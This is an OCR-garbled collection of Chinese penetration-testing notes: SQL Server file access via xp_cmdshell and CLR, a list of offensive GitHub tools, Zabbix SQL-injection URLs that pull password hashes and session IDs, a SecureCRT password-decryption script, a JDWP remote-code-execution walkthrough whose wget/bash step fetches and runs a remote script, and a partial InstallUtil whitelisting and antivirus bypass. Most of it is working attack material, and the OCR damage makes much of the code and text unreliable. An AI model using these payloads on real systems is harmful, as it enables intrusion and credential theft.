我 暂时 已 知 | 两 种 写 文件 的 方式 


select 0x313233 into outfile 'D:/1.txt' 
select 0x313233 into dumpfile 'D:/1.txt' 


— ` SQL Server 


读 文件 
1. BULK INSERT 


create table result(res varchar(8000)); 
bulk insert result from 'd:/1.txt'; 


2. CLR X, 


// 开启 CLR 集 成 


exec sp_configure 'show advanced options',1; 
reconfigure; 


exec sp_configure 'clr enabled',1 
reconfigure 


create assembly sqb from 'd:\1.exe' with permission_set=unsafe 


Ed — 4) TA] A create assembly HAMAR Z. 2$ ho HEAT NET —3 $9] SC fF SI 
数据 库 中 ;但 是 他 会 验证 是 否 为 合法 .NET 程 序 ， 导 致 失败 ， 下 面 是 读 取 方 式 


select master.dbo.fn_varbintohexstr(cast(content as varbinary)) 
from sys.assembly_files 


绕 过 ， 首 先 加 载 一 个 有 效 的 .NET 的 二 进 制 文件 ， 然 后 追加 文件 即 可 ， 下 面 是 绕 过 方 
法 。 


create assembly sqb from 'd:\net.exe'; 
alter assembly sqb add file from 'd:N1.txt' 
alter assembly sqb add file from 'd:\notnet.exe' 


1. Script.FileSystemObject 


Ft & Ole Automation Procedures 


sp configure 'show advanced options',1; 
RECONFIGURE; 

sp configure 'Ole Automation Procedures',1; 
RECONFIGURE; 


declare @o int, @f int, @t int, @ret int 

declare @line varchar (8000) 

exec sp oacreate 'scripting.filesystemobject',@o out 

exec sp oamethod Qo, 'opentextfile', Qf out, 'd:\1.txt', 1 

exec Qret = sp onmethod Qf, 'readline', Qline out 

while(Qret = 0) begin print Qline exec Qret = sp oamethod Qf, 'r 
eadline', Qline out end 


写 文件 
1. Script.FileSystemObject 
declare @o int, @f int, @t int, @ret int 
declare @line varchar(8000) 
exec sp oacreate 'scripting.filesystemobject',@o out 
exec sp oamethod Qo, 'createtextfile', Qf out, 'e:\1.txt', 1 


exec Qret = sp oamethod Qf, 'writeline', NULL ,'This is the 
test string' 


2. BCP 复 制 文件 (测试 失败 ， 无 bcp.exe) 


c:\windows>system32>bcp "select name from sysobjects" query 
testout.txt -c -s 127.0.0.1 -U sa -p"sa" 


3. xp_cmdshell 


exec xp cmdshell 'echo test>d:\1.txt' 


— ^ Oracle 


pass，Oracle 太 坟 了 ~~~ 几 乎 都 受到 PL/SQL 的 限制 ， 暂 时 不 讨论 
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Github 安全 类 Repo 收 集 整理 


原文 地 址 : https://zhuanlan.zhihu.com/p/21380662 
$ : http://Zone.wooyun.org/content/28363 


作者 : 天 论 链接 : https://zhuanlan.zhihu.com/p/21380662 来 源 : 知 乎 著作 权 归 作 


者 所 有 。 商 业 转 载 请 联系 作者 获得 授权 ， 非 商业 转载 请 注 明 出 处 。 


ELA REIS: 


WebGoat i5 25 7 tz 


https://github.com/WebGoat/WebGoat 
https://github.com/WebGoat/WebGoat-Legacy 


Damn Vulnerable Web Application( 漏 洞 练习 平台 ) 
https://github.com/RandomStorm/DVWA 
数据 库 注 入 练习 平台 
https://github.com/Audi-1/sqli-labs 

用 node 编 写 的 漏洞 练习 平台 ，like OWASP Node Goat 
https://github.com/crOhn/vulnerable-node 


花 式 扫描 器 
端口 扫描 器 Nmap 
https://github.com/nmap/nmap 


本 地 网 络 扫描 器 
https://github.com/SkyLined/LocalNetworkScanner 


子 域名 扫描 器 
漏洞 路 由 扫描 中 
https://github.com/jhOOnbr/Routerhunter-2.0 


迷你 批量 信息 泄漏 扫描 脚本 


Github 安全 类 Repo 收 集 整 理 


Waf 类 型 检测 工具 
https://github.com/EnableSecurity/wafwOOf 


信息 搜集 工具 : 


社工 插件 ， 可 查找 以 email、phone、username 的 注册 的 所 有 网 站 账号 信息 
https://github.com/nOtrOOt/Sreg 

Github 信 息 搜 集 ， 可 实时 扫描 查询 git 最 新 上 传 有 关 邮 箱 账号 密码 信息 
https://github.com/sea-god/gitscan 

github Repo 信 息 搜集 工具 

https://github.com/metacOrtex/GitHarvester 


WEB : 


webshell 大 合集 

https://github.com/tennc/webshell 

渗透 以 及 Web 攻 击 脚本 
https://github.com/brianwrf/hackUtils 

web 涂 透 小 工具 大 合集 
https://github.com/rootphantomer/hack tools for me 
XSS 数 据 接 收 平台 
https://github.com/firesunCN/BlueLotus_XSSReceiver 


XSS 与 CSRF 工 具 
https://github.com/evilcos/xssor 

Short for command injection exploiter，web 向 命令 注入 检测 工具 
https://github.com/stasinopoulos/commix 
数据 库 注 入 工具 
https://github.com/sqlmapproject/sqimap 
Web 人 代理， 通过 加 载 sqlImap api 进 行 sqli 实 时 检测 
https://github.com/zt2/sqli-hunter 

新 版 中 国 菜刀 
https://github.com/Chora10/Cknife 

git# & #] A EXP 


浏览 器 攻击 框架 
https://github.com/beefproject/beef 


AT Fr? JR os sn ir JE RK TE 
Github 4&4 X Repo'lk À 4& 3 


自动 化 绕 过 WAF 脚 本 

https://github.com/khalilbijjou/WAFNinja 

http 命 令 行 客 户 端 ， 可 以 从 命令 行 构造 发 送 各 种 http 请 求 〈 类 似 于 Curl) 
https://github.com/jkbrzt/httpie 

浏览 器 调试 利器 

https://github.com/firebug/firebug 

一 款 开 源 WAF 

https://github.com/SpiderLabs/ModSecurity 


windows 域 渗透 工具 : 


windows #347? 3 
https://github.com/gentilkiwi/mimikatz 
Powershell ‘#ié À & # 
https://github.com/PowerShellMafia/PowerSploit 
Powershell tools & À 


https://github.com/clymb3r/PowerShell 


Fuzz: 


Web® Fuzz Æ 
https://github.com/xmendez/wfuzz 


HTTP 27) KAR > d& Je 2 Æ PR 


漏洞 利用 及 攻击 框架 : 


msf 

https://github.com/rapid7/metasploit-framework 
Poc 调 用 框架 ， 可 加 载 Pocsuite,Tangscan，Beebeeto 等 
https://github.com/erevus-cn/pocscan 

Pocsuite 
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Github 安全 类 Repo 收 集 整 理 


https://github.com/knownsec/Pocsuite 
Beebeeto 
https://github.com/nOtrOOt/Beebeeto-framework 


4 | POC &EXP: 


ExploitDB  % git À 
https://github.com/offensive-security/exploit-database 
php 漏 洞 代码 分 析 

https://github.com/80vul/phpcodz 

Simple test for CVE-2016-2107 
https://github.com/FiloSottile/CVE-2016-2107 
CVE-2015-7547 POC 
https://github.com/fjserna/CVE-2015-7547 

JAVA 反 序 列 化 POC 生 成 工具 
https://github.com/frohoff/ysoserial 

JAVA 反 序 列 化 EXP 
https://github.com/foxglovesec/JavaUnserializeExploits 
Jenkins CommonCollections EXP 
https://github.com/CaledoniaProject/jenkins-cli-exploit 
CVE-2015-2426 EXP (windows A 7% 42 42) 
https://github.com/vlad902/hacking-team-windows-kernel-lpe 


合 curl 的 利用 演示 ) 

https://github.com/hxer/vulnapp 

php7 缓 存 履 写 漏洞 Demo 及 相关 工具 
https://github.com/GoSecure/php7-opcache-override 
XcodeGhost* 5 # À 
https://github.com/XcodeGhostSource/XcodeGhost 


中 间 人 攻击 及 钓鱼 


中 间 人 攻击 框架 
https://github.com/secretsquirrel/the-backdoor-factory 
https://github.com/secretsquirrel/BDFProxy 
https://github.com/byt3bI33d3r/MITMf 

Inject code, jam wifi, and spy on wifi users 


use docker to show web attack(php 434 x: fF & 224 phpinfo getshell 以 及 ssrf 结 
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https://github.com/DanMclnerney/LANs.py 
可 扩展 的 中 间 人 代理 工具 
https://github.com/intrepidusgroup/mallory 
wifi & 
https://github.com/sophron/wifiphisher 


密码 破解 : 


密码 破解 工具 
https://github.com/shinnok/johnny 


本 地 存储 的 各 类 密码 提取 利器 


https://github.com/AlessandroZ/LaZagne 


二 进 制 及 代码 分 析 工 具 : 
二 进 制 分 析 工 具 


https://github.com/devttysO/binwalk 

系统 扫描 器 ， 用 于 寻找 程序 和 库 然 后 收集 他 们 的 依赖 关系 ， 链 接 等 信息 
https://github.com/quarkslab/binmap 

rp++ is a full-cpp written tool that aims to find ROP sequences in PE/EIf/Mach-O 
(doesn't support the FAT binaries) x86/x64 binaries. 
https://github.com/OverclOk/rp 

Windows Exploit Development £ Æ 

https://github.com/lillypad/badger 

二 进 制 静 态 分 析 工 具 〈python ) 

https://github.com/bdcht/amoco 

Python Exploit Development Assistance for GDB 
https://github.com/longld/peda 

对 BillGates Linux Botnet 系 木马 活动 的 监控 工具 
https://github.com/ValdikSS/billgates-botnet-tracker 


木马 配置 参数 提取 工具 


Mith ba Z A É Dann Fs 4E $4 m 
UIINUD X + X G DO HS R EIE 


https://github.com/kevthehermit/RAT Decoders 
Shellphish 编 写 的 二 进 制 分 析 工 具 (CTF) 
https://github.com/angr/angr 


针对 python 的 静态 代码 分 析 工 具 


https://github.com/yinwangO/pysonar2 

一 个 自动 化 的 脚本 (shell) 分 析 工 具 ， 用 来 给 出 警告 和 建议 
https://github.com/koalaman/shellcheck 

基于 AST 变 换 的 简易 Javascript 反 混淆 辅助 工具 
https://github.com/ChiChou/etacsufbo 


EXP 编 写 框 架 及 工具 : 


二 进 制 EXP 编 写 工具 
https://github.com/t00sh/rop-tool 


CTF Pwn 类 题目 脚本 编写 框架 
https://github.com/Gallopsled/pwntools 


an easy-to-use io library for pwning development 
https://github.com/zTrix/zio 


跨 平 台 注 入 工具 〈 Inject JavaScript to explore native apps on Windows, Mac, 
Linux, iOS and Android. ) 
https://github.com/frida/frida 


RE: 


隐 写 检测 工具 
https://github.com/abeluck/stegdetect 


各 类 安全 资料 : 


域 渗透 教程 

https://github.com/I3mOn/pentest study 

python security 教 程 ( /& 3x: f& d£http://www.primalsecurity.net/tutorials/python- 
tutorials/) 

https://github.com/smartFlash/pySecurity 


Github 安全 类 Repo 收 集 整 理 


data_hacking 合 集 
https://github.com/ClickSecurity/data_hacking 
mobile-security-wiki 
https://github.com/exploitprotocol/mobile-security-wiki 
#4 (reverse-engineering-for-beginners) 
https://github.com/veficos/reverse-engineering-for-beginners 
一 些 信息 安全 标准 及 设备 配置 
https://github.com/luyg24/IT security 
APT 相 关 笔 记 
https://github.com/kbandla/APTnotes 
Kcon 资 料 
https://github.com/knownsec/KCon 
ctf 及 黑客 资源 合集 
https://github.com/bt3gl/My-Gray-Hacker-Resources 
ctf 和 安全 工具 大 合集 
https://github.com/zardus/ctf-tools 

(DO NOT FUCK WITH A HACKER) 
https://github.com/citypw/DNFWAH 


& X CTF 3t 7$. 


近年 ctf writeup X. # 
https://github.com/ctfs/write-ups-2016 
https://github.com/ctfs/write-ups-2015 
https://github.com/ctfs/write-ups-2014 
fbctf3E % T. & Demo 
https://github.com/facebook/fbctf 

ctf Resources 
https://github.com/ctfs/resources 


各 类 编程 资源 : 


大 礼包 (什么 都 有 ) 
https://github.com/bayandin/awesome-awesomeness bash-handbook 
https://github.com/denysdovhan/bash-handbook python 资 源 大 全 
https://github.com/jobbole/awesome-python-cn git 学 习 资料 
https://github.com/xirong/my-git 安 车 开源 代码 解析 


Github 安全 类 Repo 收 集 整 


https://github.com/android-cn/android-open-project-analysis python 框 架 ， 库 ， 资 
源 大 合集 

https://github.com/vinta/awesome-python JS 正则 表达 式 库 (用 于 简化 构造 复杂 的 
JS 正则 表达 式 ) 

https://github.com/VerbalExpressions/JSVerbalExpressions 


Python : 


python 正则 表达 式 库 (用 于 简化 构造 复杂 的 python 正 则 表达 式 ) 
https://github.com/VerbalExpressions/PythonVerbalExpressions python 任 务 管理 以 
及 命 令 执 行 库 
https://github.com/pyinvoke/invoke python exe 打 包 库 
https://github.com/pyinstaller/pyinstaller py3 Æ $ 4E À 
https://github.com/orf/cyborg 一 个 提供 底层 接口 数据 包 编 程 和 网 络 协议 支持 的 
python Æ 
https://github.com/CoreSecurity/impacket python requests Æ 
https://github.com/kennethreitz/requests python 实用 工具 合集 
https://github.com/mahmoud/boltons python $ À £i, 
https://github.com/binux/pyspider ctf 向 python 1T% & 
https://github.com/P1kachu/voOIt 


科学 上 网 : 

科学 上 网 工具 https://github.com/XX-net/XX-Net 

福利 : 

微 信 自动 抢 红包 动态 库 https://github.com/east520/AutoGetRedEnv 

微 信 抢 红包 插件 ( 安 卓 版 ) https://github.com/geeeeeeeeek/WeChatLuckyMoney 


https://github.com/yangyangwithgnu/hardseed 
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zabbix (jsrpc) 芭 新 SQL 注 入 
获取 用 户 名 密码 


http://1.2.3.4/jsrpc.php?type=9&method=screen.get&timestamp=1471 
403798083&pageFile-history.php&profileIdx-web.item.graph&profile 
Idx2=(select%20(1)%20from%20users%20wher e%201=1%20aNd%20( SELECT?6 
201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(substri 
ng( (Select%20(select%20concat (alias, 0x7e, passwd, 0x7e)%20From%20u 
sers%201imit%201) ),1, 62) ) )a%20From%20information_schema.tables%2 
Ogroup%20by%20a)b) )&updateProfile-true&period-3600&stime-2016081 
7050632&resourcetype=17%202.4.x 


获取 session 


http://1.2.3.4//jsrpc.php?type-9&method-screen.get&timestamp-147 
1403798083&pageFile-history.php&profileIdx-web.item.graph&profil 
eldx2-(select (1) from users where 1-1 aNd (SELECT 1 FROM (selec 
t count(*),concat(floor(rand(0)*2), (substring((Select (select co 
ncat(sessionid,Ox7e,userid,Ox7e,status) from sessions where stat 
us=0 and userid-1 LIMIT 0,1)),1,62)))a from information schema.t 
ables group by a)b))&updateProfile-true&period-3600&stime-201608 
17050632&resourcetype-17 


知名 渗透 测试 厂商 团队 的 报告 模板 ( 含 下 载 ) 
URL : https://github.com/xiaohen/public-pentesting-reports 


Cure53 : 德国 安全 审计 和 渗透 测试 服务 商 ， 曾 发 现 韩 国 儿 童 监 控 定 位 APP“ 智 慧 警 长 ”( 
Smart Sheriff) 和 手机 通讯 软件 Peerio 漏 洞 。 
网 站 : https://cure53.de/ 


Defuse : 一 家 提供 安全 审计 和 密码 服务 的 加 拿 大 安全 公司 。 
网 站 : https://defuse.ca 


FOX-IT: 荷兰 安全 公司 ， 提 供 网 络 威胁 管理 、 安 全 事件 响应 和 移动 安全 分 析 。FOX-IT 
曾 协 助 荷兰 执法 部 门 打 击 僵尸 网 络 ， 并 于 今年 6 月 发 现 了 MoFang APT 攻 击 组 织 。 
网 站 : https://www.fox-it.com/ 


Fraunhofer : Fraunhofer SIT， 德 国安 全 认证 评估 公司 ， 专 注 于 电子 信息 系统 和 移 
动 软件 审计 。 提 供 车 载 软件 可 信 模 块 TPM 2.0 解 决 方案 ， 公 司 为 德国 “工业 4.0” 技 术 支 
Hd 


网 站 : https://www.sit.fraunhofer.de/ 


IOActive : 美国 网 络 安全 公司 ， 提 供 渗透 测试 、 逆 向 、 代 码 审 计 和 硬件 安全 评估 等 服 
务 。 公 司 于 2014 年 发 布 名 为 《A Wake-up Call for SATCOM Security》 的 卫星 
通信 报告 ， 声 称 包括 美国 军 方 卫星 网 络 在 内 的 卫星 通信 终端 存在 漏洞 ， 可 能 被 黑客 入 侵 
。 并 于 去 年 发 现 联 想 更 新 程序 提 权 漏洞 。 汽 车 黑客 chris Valasek 也 曾 在 IOActiv 
e 工 作 过 。 

网 站 : http://www.ioactive.com/ 


IndependentSecurityEvaluators : 位 于 美国 马里 兰 的 安全 评估 公司 。Charlie 
Miller 曾 在 该 公司 担任 过 首席 安全 分 析 师 。 
网 站 : http://www.securityevaluators.com/ 


LeastAuthority : 一 家 专注 于 商业 数据 安全 的 小 型 安全 公司 。 
网 站 : https://leastauthority.com/ 


Leviathan: Leviathan Security， 提 供 企业 攻击 检测 分 析 和 威胁 管理 服务 。 
网 站 : http://www.leviathansecurity.com/ 


Matasano Security: 美国 安全 研究 公司 ， 专 注 于 企业 和 供应 商 漏洞 发 现 、 架 构 审 查 
` 渗透 测试 、 逆 向 工程 和 代码 审查 。 公 司 于 2008 年 大 意 曝光 了 一 个 DNS 重 大 漏洞 机 制 和 
技术 细节 。 

网 站 : https://www.nccgroup.trustZ-s] T20124F3X NCC Group 收购 。 


OPM-0IG : 美国 联邦 人 事 管 理 局 OPM 在 2015 年 11 月 的 安全 审计 报告 。2015 年 6 月 ，OPM 
声称 自身 网 络 遭 到 网 络 攻 击 ， 将 近 400 万 联邦 雇员 信息 被 窃 。 
网 站 : https://www.opm.gov/ 


0S3 : 阿姆斯特丹 大 学 安全 研究 团队 (Open Standards, OpenSoftware and Ope 
n Security) ，Tinder : 一 款 交 友 聊 天 软件 。 
网 站 : https://www.os3.nl 


Offensive Security : 一 家 提供 安全 培训 和 活 透 测试 服务 的 公司 ， 大 名 易 易 的 Back 
track 和 KALI 的 发 行商 。 其 渗透 测试 报告 模板 值得 参考 。 
网 站 : https://www.offensive-security.com/ 


供 密 码 服务 ， 如 著名 的 John the Ripper ; 0penVZ 是 基于 Linux 平 台 的 操作 系统 级 服 
务 器 虚拟 化 解决 方案 。 
网 站 : http://www.openwall.com/ 


ProCheckUp : 英国 伦敦 的 一 家 渗透 测试 公司 ， 曾 发 现 Check Point 旗 下 防火 墙 和 Ado 
be 公司 ColdFusion 的 多 个 漏洞 。 
网 站 : http://www.procheckup.com/ 


PwC : 普 华 永 道 ， 提 供 会 计 事 务 之 外 ， 还 提供 企业 审计 、 风 险 管 理 、 信 息 安 全 管理 等 服 
pa 
FT 


网 站 : http://www.pwc.com/ 


Quarkslab : 一 家 总 部 位 于 巴黎 的 安全 公司 ， 专 注 于 安全 分 析 和 安全 培训 。 曾 声称 苹果 
公司 自身 能 拦截 jMessage 信 息 。 
网 站 : http://www.quarkslab.com/ 


Sakurity : 2012 年 成 立 于 香港 的 安全 公司 ， 提 供 活 透 测试 、 源 代码 审计 和 漏洞 管理 服 
务 。 


网 站 : http://sakurity.com/ 


SecureLayer7 : 位 于 印度 马 哈 拉 施 特 拉 邦 ， 提 供 渗 透 测 试 、 安 全 恢复 和 事件 响应 的 安 


全 公司 。 


网 站 : https://securelayer7.net/ 


Trail0fBits : 纽约 一 家 安全 咨询 公司 ，2016 年 3 月 ，FBI 与 苹果 大 战 中 ，Trail0ofB 
its 曾 试图 寻找 破解 iPhone 系统 的 方法 。 
网 站 > https://www.trailofbits.com/ 


Veracode :一 家 网 络 安 全 技术 公司 ， 以 渗透 测试 、 第 三 方 组 件 安全 和 应 用 程序 评估 为 
E 
网 站 : http://www.veracode.com/ 


iSEC Partners : 美国 一 家 安全 服务 公司 ， 后 被 NCC Group 收 购 。 
Github : https://github.com/iSECPartners 


Mnemonic : 挪威 威胁 检测 和 安全 响应 公司 。 
网 站 : https://www.mnemonic.no/ 


查看 SecureCRT session 配 置 文件 中 的 密码 


from Crypto.Cipher import Blowfish 
import argparse 
import re 


def decrypt(password) 

ci = Blowfish.new('5F BO 45 A2 94 17 D9 16 C6 C6 A2 FF 06 41 
82 B7'.replace(' ','').decode('hex'), Blowfish.MODE CBC, '*x00'* 
8) 

c2 - Blowfish.new('24 A6 3D DE 5B D3 B3 82 9C 7E 06 F4 08 16 
AA 07'.replace(' ','').decode('hex'), Blowfish.MODE CBC, '\x00'* 


padded = ci.decrypt(c2.decrypt(password.decode( 'hex'))[4:-4] 


p= 
while padded[:2] != '\x00\x00' 
p += padded[:2] 
padded = padded[2: ] 
return p.decode( 'UTF-16') 


REGEX HOSTNAME = re.compile(ur'S:"Hostname"=([4\r\n]*)') 
REGEX PASWORD = re.compile(ur'S:"Password"=u([0-9a-f]+)') 
REGEX PORT = re.compile(ur'D:"N[SSH2N] Port"=([0-9a-f]{8})') 
REGEX USERNAME = re.compile(ur'S:"Username"=([4\r\n]*)') 


def hostname(x) 
m = REGEX HOSTNAME.search(x) 
a M e 
return m.group(1) 
return '???' 


def password(x) 
m = REGEX_PASWORD.search(x) 
LI 
return decrypt(m.group(1)) 
retunm © 222) 


查看 SecureCRT session 配 置 文件 中 的 密码 


def port(x) 
m = REGEX_PORT.search(x) 
ifm: 
return '-p %d '%(int(m.group(1), 16)) 
return '' 


def username(x) 
m = REGEX USERNAME.search(x) 
ii Me: 
return m.group(1) + '@' 
return '' 


parser - argparse.ArgumentParser(description-'Tool to decrypt SS 
Hv2 passwords in VanDyke Secure CRT session files') 

parser.add argument('files', type-argparse.FileType('r'), nargs= 
Pagus 


help='session file(s)') 


args = parser.parse args() 


for f in args.files : 

c = f.read().replace('\x00"', '') 

print f.name 

print "ssh %s%s%s # %s"%(port(c), username(c), hostname(c), 
password(c)) 


sr) | 





78 


Java Debug Remote Code Execution 


0x01. 判断 是 否 存 在 jdwp 命 令 执行 漏洞 
telnet 端 口 后 ， 输 入 命令 JDWP-Handshake 
如 果 返 回 JDWP-Handshake， 证 明 存 在 漏洞 。 
并 且 ， 如 果 不 快 速 输入 ， 连 接 立马 就 会 断 掉 。 
> ~ telnet 1.2.3.4 8000 
HOS N RSI 1294. 
Connected to 1.2.3.4. 
Escape character is '^]'. 


JDWP -Handshake 
JDWP -Handshake 


常用 java debug 端 口号 : 5005, 8000, 8080, 8181, 8453, 8787, 8788, 9001 


注意 : 如 果 正 在 用 下 面 的 exp 打 的 时 候 ，exp 正 处 于 断 点 的 界面 时 ，telnet 会 失败 
0x02. exp 
利用 国外 一 个 牛 允 的 脚本 进行 命令 执行 。 使 用 方法 如 下 : 


usage: jdwp-shellifier.py [-h] -t IP [-p PORT] [--break-on JAVA_ 
METHOD] 


[--cmd COMMAND] 


当 不 加 cmd 参 数 时 ， 会 发 现 暂 停 如 下 ， 并 且 还 可 以 观察 到 jdk 的 版 本 为 1.7.0_79 


> jdwp_exp python jdwp-shellifier.py -t 1.2.3.4 -p 8000 

[+] Targeting '1.2.3.4:8000' 

[+] Reading settings for 'Java HotSpot(TM) 64-Bit Server VM - 1. 
TO TS 

[+] Found Runtime class: id=1fd3 

[+] Found Runtime.getRuntime(): id=7fa408018490 

[+] Created break event id=2 

[+] Waiting for an event on 'java.net.ServerSocket.accept' 


此 时 ， 需 要 访问 服务 器 的 80 和 443， 即 web 端 口 (一 般 直接 用 ip 在 浏览 器 中 访问 ) ， 
才能 触发 脚本 中 的 断 点 (很 重要 ) 


访问 后 ， 命 令 已 经 成 功 执行 ， 如 下 : 


> jdwp_exp python jdwp-shellifier.py -t 1.2.3.4 -p 8000 

[+] Targeting '1.2.3.4:8000' 

[+] Reading settings for ‘Java HotSpot(TM) 64-Bit Server VM - 1. 
1 0270 

[+] Found Runtime class: id=1fd3 

[+] Found Runtime.getRuntime(): id=7fa408018490 

[+] Created break event id=2 

[+] Waiting for an event on 'java.net.ServerSocket.accept' 

[+] Received matching event from thread 0x2427 

[+] Found Operating System 'Linux' 

[+] Found User name 'root' 

[+] Found ClassPath '/datai/tomcat/pop. ywxt/bin/bootstrap.jar:/d 
atal1/tomcat/pop ywxt/bin/tomcat-juli.jar' 

[*] Found User home directory '/root' 

[!] Command successfully executed 


-Cmd 参 数 执行 命令 后 没有 回 显 ， 所 以 最 好 反弹 shell。 


但 是 由 于 java 的 exec 有 函数 配合 jdwp-shellifier 这 个 exp 脚 本 不 能 直接 反弹 shell。 那 
23 


反弹 shell 姿 执 


jdwp-shellifier.py -t 目标 IP -p 端口 --cmd "wget http://x.x.x.x/x 
.txt -0 /tmp/x.sh" 
jdwp-shellifier.py -t 目标 IP -p 端口 --cmd "bash /tmp/x.sh" 


注意 这 个 exp 脚 本 对 jdk 版 本 支持 不 完全 : 


This exploit script was successfully tested against: 
Oracle Java JDK 1.6 and 1.7 

OpenJDK 1.6 

IBM JDK 1.6 


实例 中 ， 当 遇 到 jdk 1.8 版 本 的 case， 断 点 不 能 被 触发 。 


0x03. 修复 方案 
1、 关 闭 debug 模 式 当 ps 查 看 进程 的 时 候 


/root/jdk1.8.0 45/bin/java -Djava.util.logging.config.file-/root 
/apache-tomcat-7.0.42/conf/logging.properties -Djava.util.loggin 
g.manager=org.apache. juli.ClassLoaderLogManager -Xdebug -Xrunjdw 
p:transport-dt socket,address=8000, server=y,suspend=n -Djava.end 
orsed.dirs-/root/apache-tomcat-7.0.42/endorsed -classpath /root/ 
apache-tomcat-7.0.42/bin/bootstrap.jar:/root/apache-tomcat-7.0.4 
2/bin/tomcat-juli.jar -Dcatalina.base-/root/apache-tomcat-7.0.42 

-Dcatalina.home-/root/apache-tomcat-7.0.42 -Djava.io.tmpdir-/ro 
ot/apache-tomcat-7.0.42/temp org.apache.catalina.startup.Bootstr 
ap start 


发 现 启动 jdwp 的 参数 是 -Xdebug - 
Xrunjdwp:transport=dt_socket,address=8000,server=y,suspend=n 所 以 重启 java 服 
务 ， 将 上 面 的 参数 去 掉 就 ok 


2、 或 者 用 iptables 关 闭 相应 jdwp 对 外 访问 的 端口 


0x04. 参考 链接 


Java Debug Remote Code Execution 


https://github.com/IOActive/jdwp-shellifier 
http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html 
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2* f] J PowerShell X 4077 ? 看 我 如 何 用 
PowerShell 绕 过 应 用 白 名 单 、 环 境 限 制 、 以 及 杀毒 
软件 


温 故 而 知 新 


在 之 前 的 文章 中 ， 我 们 讨论 了 如 何 通过 Casey Smith (@ subTee) 设计 出 的 方法 来 
绕 过 反 病 毒 软 件 和 应 用 白 名 单 。 这 一 次 ， 我 们 的 测试 条 件 将 变 得 更 为 苛刻 。 用 于 测 
试 的 目标 系统 中 不 仅 设 置 有 反 病 毒 软 件 和 应 用 和 白 名 单 ， 而 且 还 禁用 了 PowerShell 和 
命令 行 工 具 (cmd.exe) 。 在 测试 的 过 程 中 ， 我 们 也 遇 到 了 各 种 各 样 的 问题 ， 我 们 
将 在 这 篇 文章 中 讨论 这 些 问题 和 测试 过 程 中 所 发 生 的 意外 情况 。 


现在 ， 越 来 越 多 的 公司 开始 逐渐 意识 到 ， 普 通用 户 其 实 根本 就 不 需要 使 用 命令 行 工 
具 (cmd.exe) 、PowerShell、 以 及 其 他 一 些 看 起 来 比较 高 大 上 的 工具 。 我 们 也 发 
现 ， 禁 用 这 些 高 级 工具 也 是 保护 系统 安全 的 一 种 非常 好 的 实践 方法 。 


如 果 你 看 过 我 们 出 的 《Sacred Cash Cow Tipping》 系 列 视频 ， 那 么 你 应 该 还 记得 
我 当时 设计 出 了 一 种 能 够 在 C# 程 序 中 执行 Invoke-Shellcode.ps1 文 件 的 方法 。 实 际 
上 ， 你 只 需要 直接 将 这 个 Invoke-Shellcode.ps1 文 件 中 的 代码 全 部 放 在 一 行 ， 然 后 
将 该 文件 的 所 有 内 容错 入 到 C# 程 序 的 一 个 字符 囊 变 量 中 就 可 以 了 。 你 将 会 得 到 一 个 
独立 的 可 执行 文件 ， 它 可 以 生成 一 个 Meterpreter Shell， 并 且 可 以 绕 过 目前 绝 大 多 
数 的 反 病 毒 产 品 。 


写 在 前 面 的 话 


那么 ， 刚 才 所 介绍 的 那些 内 容 与 我 们 这 篇 文章 有 半 毛 钱 关 系 吗 ? 当然 有 有 了， 不 然 我 
介绍 来 干 嘛 。 实 际 上 ， 我 们 只 需要 将 刚才 这 一 概念 稍微 扩展 一 下 ， 就 可 以 轻松 地 在 
一 个 禁用 了 PowerShell 的 环境 中 执行 任意 的 PowerShell 脚 本 了 。 





我 们 应 该 怎么 做 呢 ? 从 本 质 上 来 讲 ，C# 和 PowerShell 其 实 都 是 运行 在 .Net 框 架 之 上 
的 高 级 实现 。 这 也 就 意味 着 ， 我 们 可 以 通过 C# 可 执行 程序 直接 调用 .Net 框 架 开 放 给 
PowerShell 的 那 部 分 功能 。 如 果 你 愿意 的 话 ， 你 可 以 编写 一 个 C# 程 序 ， 然 后 用 它 来 
实现 PowerShell 脚 本 的 所 有 功能 。 


少 说 话 ， 多 做 事 


准备 工作 已 经 做 得 差不多 了 ， 让 我 们 开始 动手 实现 吧 ! 首先 ， 在 你 的 Windows 桌 面 
上 用 记事 本 创建 一 个 新 的 文本 文件 ， 然 后 将 其 重 命名 为 Program.cs。 好 吧 .. 其 实 随 
便 你 取 什 么 名 字 都 可 以 ， 这 只 是 个 不 成 熟 的 小 建议 。 创 建 完 成 之 后 ， 用 
NotePad++ 之 类 的 文本 编辑 器 打开 它 。 现 在 ， 我 们 需要 在 文件 的 顶部 写 入 下 列 声 明 
语句 ， 并 引入 我 们 所 要 使 用 到 的 某 些 功能 : 


Ising System; 
using System.Configuration.Install; 
ng System.Runtime.InteropServices; 
using System.Management.Automation.Runspaces; 


为 了 确保 我 们 的 程序 能 够 编译 成 功 ， 我 们 还 需要 定义 一 个 类 ， al 
^*Main() Z » FOUT * RAT AYALA AB ZX  Main() BAAS BPRS JIT 

Pr 0.90594 (02.5 e 
添加 到 资源 声明 语句 的 下 方 : 


public class Program 
{ 
public static void Main() 
{ 
j 


接 下 来 ， 我 们 要 定义 程序 真正 的 入 口 函 数 了 。 请 注意 ， 我 们 需要 使 用 InstallUtil.exe 
工具 来 运行 我 们 的 程序 ， 而 不 是 直接 用 鼠标 堪 键 双击 运行 。 我 就 不 卖 关 子 了 ， 正 是 
这 一 技巧 将 帮助 我 们 绕 过 应 用 白 名 单 的 限制 。 


为 了 完成 我 们 的 目标 ， 我 定义 了 一 个 名 为 “Sample” 的 类 ， 并 让 它 继承 Installer 类 。 
然后 ， 我 还 声明 了 一 个 名 为 “Uninstal* 的 方法 ， 这 个 方法 就 是 我 们 程序 丨 正 的 入 口 
函数 。 所 以 ， 我 们 的 程序 所 要 执行 的 第 一 个 任务 就 是 调用 这 个 名 为 “Exec” 的 方法 
(Exec() 是 Mycode 类 中 的 一 个 方法 ) 。 除 此 之 外 ， 我 们 还 要 在 这 个 类 的 上 方 添加 一 
条 声明 语 匈 ， 用 来 表示 这 个 类 需要 在 程序 的 安装 过 程 中 被 调用 执行 。 在 Program.cs 
文件 的 底部 添加 下 列 代码 : 


[System.ComponentModel.RunInstaller(true)] 
public class Sample : System.Configuration.Install.Installer 


{ 
public override void Uninstall(System.Collections.IDictionary s 
avedState) 


L 
Mycode.Exec(); 


} 
} 


我 们 所 要 写 的 最 后 一 部 分 代码 就 是 去 定义 一 个 Mycode 类 ， 然 后 在 这 个 类 中 添加 一 
个 名 为 “Exec” 的 方法 。 这 个 方法 可 以 根据 用 户 提供 的 文件 路 径 读 入 一 个 PowerShell 
